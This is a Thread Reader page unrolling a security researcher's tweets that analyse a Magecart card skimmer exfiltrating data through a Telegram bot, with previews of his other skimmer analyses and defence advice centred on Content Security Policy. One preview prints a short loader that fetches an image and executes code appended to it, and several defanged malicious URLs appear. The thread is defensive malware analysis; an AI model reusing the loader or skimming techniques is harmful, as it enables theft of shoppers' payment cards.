Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Eric Brandel Profile picture
@AffableKraut
Aug 28, 2020 12 tweets 5 min read Read on X
Scrolly
Thanks to data from @sansecio I think we've found the first digital skimmer/#magecart script to exfil using Telegram. In this thread, I'll go through the code, the drawbacks of this approach, and how to stop it dead (hint: CSP).

1/11
This of course isn't the first digital skimmer to abuse unrelated services to exfil its data. For example, back in June we saw the public disclosure of digital skimmers abusing Google Analytics: sansec.io/research/skimm…

2/x
A prettified version of the script is here: gist.github.com/krautface/c07a…

It's mostly unaltered, but I did redact one bit of information which I'll mention later.

3/x
Lines 1-63 are pretty standard anti-RE checks. Looks to see if Firebug is open and looks to see if it can detect if the brower's devtools are open. This check is, as always, ineffective if you pop your devtools out.

4/x Image
On line 69 there is a loadScript function which will take a URL and a function to call after the script is loaded. On line 80 we see the loadScript function used to bring in JSEncrypt.

5/x Image
The public key for JSEncrypt is on line 120, followed by the jsencryptstart function.

6/x ImageImage
On Line 227 is the getData function. It looks for every type of input field it can find, and then goes through them all, comparing them to a list of possible field names that were specified on Line 113.

7/x ImageImage
The payer() function on Line 288 is where the data exfil occurs. It first grabs the data by calling getData and then verifies it has address details, trying to find them in another place if it hasn't yet retrieved them.

8/x Image
It then encrypts the data with the public key and runs some base64 encoded code, which is the actual exfil code, and the interesting part in all of this. To post to Telegram using a bot all you need is the bot token and a chat to post into.

9/x Image
The tbot variable contains the bot token, and it's currently redacted in the code I shared above. The reason being? Anyone could control the bot using that token, and mostly likely gobble up the cards being exfiltrated.

10/11 Image
And that's the big drawback here: Telegram isn't setup to do this type of thing properly, you have to grant publicly accessible code too much power. And, like many other digital skimming/#magecart techniques, this can be preemptively defeated via a Content Security Policy.

11/11
"and mostly likely gobble up the cards being exfiltrated" -

Now that I think about it, that isn't possible in this case with the public key encryption being employed.

12/11

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Eric Brandel

Eric Brandel Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @AffableKraut

Eric Brandel Profile picture
Feb 23, 2021
Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.

Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.

1/30
Going to cover a fair amount of ground here:

- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter

And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.

2/30
Ok, first, here's some source code:

ManyQ Obfuscated: gist.github.com/krautface/ea24…

ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…

This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of this it:


3/30
Read 31 tweets
Eric Brandel Profile picture
Feb 6, 2020
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
Read 10 tweets
Eric Brandel Profile picture
Dec 26, 2019
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}

3/5
Read 6 tweets
Eric Brandel Profile picture
Dec 17, 2019
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets
Eric Brandel Profile picture
Aug 27, 2019
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Read 12 tweets
Eric Brandel Profile picture
Aug 2, 2019
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
Read 37 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(